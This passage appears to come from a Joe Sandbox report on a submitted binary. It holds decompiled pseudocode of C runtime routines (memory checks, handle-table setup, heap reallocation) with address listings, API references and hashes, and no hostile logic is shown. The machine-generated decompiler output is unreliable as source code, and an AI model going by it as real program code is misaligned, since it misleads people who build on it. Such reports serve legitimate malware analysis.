					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x45a5c8; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x45a610, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x45a5c8; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x45a610, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x45a5c8 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x45a5d0 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x45a5cc + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x45a5d0 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x45a5d0 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x45a610, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x45a5d0 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x45a5d0 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x45a610, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x45a5d0 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x45a5c8; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x45a5c8 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x45a5d0 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x45a5d0 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}



































                                                                              0x00416f70
                                                                              0x00416f73
                                                                              0x00416f79
                                                                              0x00416f96
                                                                              0x00000000
                                                                              0x00416f96
                                                                              0x00416f81
                                                                              0x00416f84
                                                                              0x00416f87
                                                                              0x00416f8c
                                                                              0x00416f8f
                                                                              0x00416f9e
                                                                              0x00416fa1
                                                                              0x00416fa4
                                                                              0x00416fae
                                                                              0x00416fae
                                                                              0x00416fb0
                                                                              0x00416fb3
                                                                              0x00416fb5
                                                                              0x00416fb5
                                                                              0x00416fb7
                                                                              0x00416fba
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416fbc
                                                                              0x00416fbe
                                                                              0x00417109
                                                                              0x00417109
                                                                              0x0041718c
                                                                              0x00000000
                                                                              0x0041718c
                                                                              0x00416fc4
                                                                              0x00416fc4
                                                                              0x00416fc8
                                                                              0x00416fca
                                                                              0x00416fca
                                                                              0x00416fca
                                                                              0x00416fca
                                                                              0x00416fcd
                                                                              0x00416fce
                                                                              0x00416fd1
                                                                              0x00416fd1
                                                                              0x00416fd5
                                                                              0x00416fd9
                                                                              0x00416fef
                                                                              0x00416fef
                                                                              0x00416ff6
                                                                              0x00416ffc
                                                                              0x00416ffe
                                                                              0x00417000
                                                                              0x00417014
                                                                              0x0041701b
                                                                              0x00417021
                                                                              0x00417023
                                                                              0x00417189
                                                                              0x00417189
                                                                              0x00417189
                                                                              0x00000000
                                                                              0x00417189
                                                                              0x00417029
                                                                              0x00417030
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417036
                                                                              0x0041703a
                                                                              0x00417092
                                                                              0x00417099
                                                                              0x0041709f
                                                                              0x004170a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004170a7
                                                                              0x004170ad
                                                                              0x004170af
                                                                              0x004170b1
                                                                              0x004170c6
                                                                              0x004170c6
                                                                              0x004170c8
                                                                              0x004170f7
                                                                              0x004170fe
                                                                              0x00000000
                                                                              0x004170fe
                                                                              0x004170cc
                                                                              0x004170cd
                                                                              0x004170cf
                                                                              0x004170d1
                                                                              0x004170d1
                                                                              0x004170d3
                                                                              0x004170d5
                                                                              0x004170d7
                                                                              0x004170eb
                                                                              0x004170eb
                                                                              0x004170ee
                                                                              0x004170f0
                                                                              0x004170f0
                                                                              0x004170f1
                                                                              0x004170f1
                                                                              0x00000000
                                                                              0x004170d9
                                                                              0x004170d9
                                                                              0x004170d9
                                                                              0x004170e2
                                                                              0x004170e3
                                                                              0x004170e5
                                                                              0x004170e7
                                                                              0x004170e7
                                                                              0x00000000
                                                                              0x004170d9
                                                                              0x004170d7
                                                                              0x004170b3
                                                                              0x004170ba
                                                                              0x004170ba
                                                                              0x004170bc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004170be
                                                                              0x004170bf
                                                                              0x004170c2
                                                                              0x004170c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004170c4
                                                                              0x00000000
                                                                              0x004170ba
                                                                              0x0041703c
                                                                              0x0041703f
                                                                              0x00417044
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041704d
                                                                              0x0041704f
                                                                              0x00417055
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041705b
                                                                              0x00417061
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417067
                                                                              0x00417069
                                                                              0x00417072
                                                                              0x00417076
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041707c
                                                                              0x0041707f
                                                                              0x00417081
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417088
                                                                              0x0041708a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041708c
                                                                              0x00417090
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417002
                                                                              0x00417002
                                                                              0x00417002
                                                                              0x00417009
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041700f
                                                                              0x00417010
                                                                              0x00417012
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417012
                                                                              0x0041710d
                                                                              0x0041710f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417122
                                                                              0x00417124
                                                                              0x00417126
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041712c
                                                                              0x00417133
                                                                              0x00417163
                                                                              0x00417163
                                                                              0x00417165
                                                                              0x00417167
                                                                              0x0041717b
                                                                              0x00417182
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417169
                                                                              0x00417169
                                                                              0x00417169
                                                                              0x00417172
                                                                              0x00417173
                                                                              0x00417175
                                                                              0x00417177
                                                                              0x00417177
                                                                              0x00000000
                                                                              0x00417169
                                                                              0x00417135
                                                                              0x0041713a
                                                                              0x0041713a
                                                                              0x0041713d
                                                                              0x0041713f
                                                                              0x00417151
                                                                              0x00417151
                                                                              0x00417154
                                                                              0x00417156
                                                                              0x00417156
                                                                              0x00417157
                                                                              0x00417157
                                                                              0x0041715c
                                                                              0x0041715c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417141
                                                                              0x00417141
                                                                              0x00417141
                                                                              0x00417148
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041714a
                                                                              0x0041714a
                                                                              0x0041714b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041714b
                                                                              0x0041714d
                                                                              0x0041714f
                                                                              0x00417161
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417161
                                                                              0x00000000
                                                                              0x0041714f
                                                                              0x00416fdb
                                                                              0x00416fde
                                                                              0x00416fe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416fe7
                                                                              0x00416fe9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00416fe9
                                                                              0x00416fa6
                                                                              0x00416fa8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00412C31,?), ref: 0041701B
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000001), ref: 00417099
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000000), ref: 004170FE
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000001), ref: 00417122
                                                                              • InterlockedExchange.KERNEL32(0045A610,00000000), ref: 00417182
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$QueryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2947987494-0
                                                                              • Opcode ID: 0aa183bda9df58c028869d4e75be92f0ccf6beec2a2a0e118c9584023782ac0b
                                                                              • Instruction ID: c95ea2de7b60af55566014a0c679c7fd9ca5feca68085abe148ecfceabce0a8c
                                                                              • Opcode Fuzzy Hash: 0aa183bda9df58c028869d4e75be92f0ccf6beec2a2a0e118c9584023782ac0b
                                                                              • Instruction Fuzzy Hash: 2D510530A08716AFCB258F18D9D4BEA77B2AB45714F25866BD40287391E778DCC2864D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004178F9, Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E004178F9() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E00412247(0x480);
				if(_t51 != 0) {
					 *0x45bb20 = _t51;
					 *0x45bb18 = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x45bb20; // 0x2270640
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x45bb20; // 0x2270640
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_t44 =  &(_t103[3]); // 0xc
								_push(0xfa0);
								_t64 = E0041AD20(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x45bb18);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x45bb18 - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x45bb20[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_t30 =  &(_t105[3]); // 0xc
								_push(0xfa0);
								_t64 = E0041AD20(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x45bb24;
						while(1) {
							_t78 = E00412247(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x45bb18 =  *0x45bb18 + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x45bb18 - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x45bb18; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}



























                                                                              0x00417903
                                                                              0x0041790b
                                                                              0x00417915
                                                                              0x0041791a
                                                                              0x00417924
                                                                              0x00417924
                                                                              0x0041794a
                                                                              0x0041794a
                                                                              0x0041794c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041792c
                                                                              0x0041792f
                                                                              0x00417933
                                                                              0x00417937
                                                                              0x0041793b
                                                                              0x00417941
                                                                              0x00417944
                                                                              0x00417944
                                                                              0x00417944
                                                                              0x00417956
                                                                              0x0041795c
                                                                              0x00417962
                                                                              0x00417a51
                                                                              0x00417a51
                                                                              0x00417a51
                                                                              0x00417a53
                                                                              0x00417a53
                                                                              0x00417a5c
                                                                              0x00417a5f
                                                                              0x00417a62
                                                                              0x00417ad3
                                                                              0x00417ad3
                                                                              0x00417ad3
                                                                              0x00000000
                                                                              0x00417ad3
                                                                              0x00417a64
                                                                              0x00417a66
                                                                              0x00417a6a
                                                                              0x00417a7b
                                                                              0x00417a7d
                                                                              0x00417a7d
                                                                              0x00417a6c
                                                                              0x00417a6e
                                                                              0x00417a6e
                                                                              0x00417a87
                                                                              0x00417a89
                                                                              0x00417a8c
                                                                              0x00417acd
                                                                              0x00417acd
                                                                              0x00417a8e
                                                                              0x00417a8f
                                                                              0x00417a95
                                                                              0x00417a97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417a99
                                                                              0x00417a9e
                                                                              0x00417aa1
                                                                              0x00417aa3
                                                                              0x00417aab
                                                                              0x00417aae
                                                                              0x00417ab0
                                                                              0x00417ab0
                                                                              0x00417ab0
                                                                              0x00417ab0
                                                                              0x00417aa5
                                                                              0x00417aa5
                                                                              0x00417aa5
                                                                              0x00417ab4
                                                                              0x00417ab7
                                                                              0x00417abd
                                                                              0x00417ac2
                                                                              0x00417ac6
                                                                              0x00417a71
                                                                              0x00417a71
                                                                              0x00417aef
                                                                              0x00000000
                                                                              0x00417ac8
                                                                              0x00417ac8
                                                                              0x00000000
                                                                              0x00417ac8
                                                                              0x00417ac6
                                                                              0x00417ad7
                                                                              0x00417ad7
                                                                              0x00417ad8
                                                                              0x00417ad8
                                                                              0x00417ae7
                                                                              0x00417aed
                                                                              0x00417aed
                                                                              0x00000000
                                                                              0x00417aed
                                                                              0x00417968
                                                                              0x0041796c
                                                                              0x0041796e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417974
                                                                              0x00417976
                                                                              0x0041797c
                                                                              0x00417985
                                                                              0x00417987
                                                                              0x00417989
                                                                              0x00417989
                                                                              0x0041798b
                                                                              0x00417991
                                                                              0x004179e1
                                                                              0x004179e1
                                                                              0x004179e3
                                                                              0x004179e5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179e7
                                                                              0x004179e7
                                                                              0x004179eb
                                                                              0x004179ed
                                                                              0x004179f0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179f2
                                                                              0x004179f5
                                                                              0x004179f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179fa
                                                                              0x004179fd
                                                                              0x00417a0a
                                                                              0x00417a1e
                                                                              0x00417a27
                                                                              0x00417a2c
                                                                              0x00417a2f
                                                                              0x00417a32
                                                                              0x00417a38
                                                                              0x00417a3d
                                                                              0x00417a41
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417a43
                                                                              0x00417a43
                                                                              0x00417a43
                                                                              0x00000000
                                                                              0x00417a43
                                                                              0x00417a06
                                                                              0x00417a08
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417a46
                                                                              0x00417a46
                                                                              0x00417a4b
                                                                              0x00417a4c
                                                                              0x00417a4d
                                                                              0x00417a4d
                                                                              0x00000000
                                                                              0x00417993
                                                                              0x00417993
                                                                              0x00417998
                                                                              0x00417999
                                                                              0x0041799e
                                                                              0x004179a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179a3
                                                                              0x004179aa
                                                                              0x004179ac
                                                                              0x004179ac
                                                                              0x004179ca
                                                                              0x004179ca
                                                                              0x004179cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179b4
                                                                              0x004179b7
                                                                              0x004179bb
                                                                              0x004179bf
                                                                              0x004179c5
                                                                              0x004179c8
                                                                              0x004179c8
                                                                              0x004179c8
                                                                              0x004179ce
                                                                              0x004179d1
                                                                              0x004179d7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004179d9
                                                                              0x004179db
                                                                              0x00000000
                                                                              0x004179db
                                                                              0x00417991
                                                                              0x00000000

                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00417956
                                                                              • GetFileType.KERNEL32(?), ref: 00417A00
                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00417A81
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleInfoStartupType
                                                                              • String ID:
                                                                              • API String ID: 2461013171-0
                                                                              • Opcode ID: 2468a7fb6b581299d97185e491f5b1cae576bf7ec8e0cf272241cd6d45883991
                                                                              • Instruction ID: c1dad45932cd3bab1fb4690d5443e572ef26b780f196b193fce980895ef8ff34
                                                                              • Opcode Fuzzy Hash: 2468a7fb6b581299d97185e491f5b1cae576bf7ec8e0cf272241cd6d45883991
                                                                              • Instruction Fuzzy Hash: 9F5108716083418FD7108B28C884BAA7BF4FF11365F28862ED5A6C72E2D778E589C749
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00413347, Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 50%
                                                                              			E00413347(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x44bcb0);
				E00412BA4(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *0x45bc48 - 3;
						if( *0x45bc48 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x45bc44, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x45a59c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E004154B7(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x45a59c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E004148F8(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E004149DC(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E004134AF();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x45bc44, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x45bc34; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E00414EDC();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E004151BB();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E00411AC0( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E004149DC(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E00414A07();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x45bc44, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E00411AC0( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
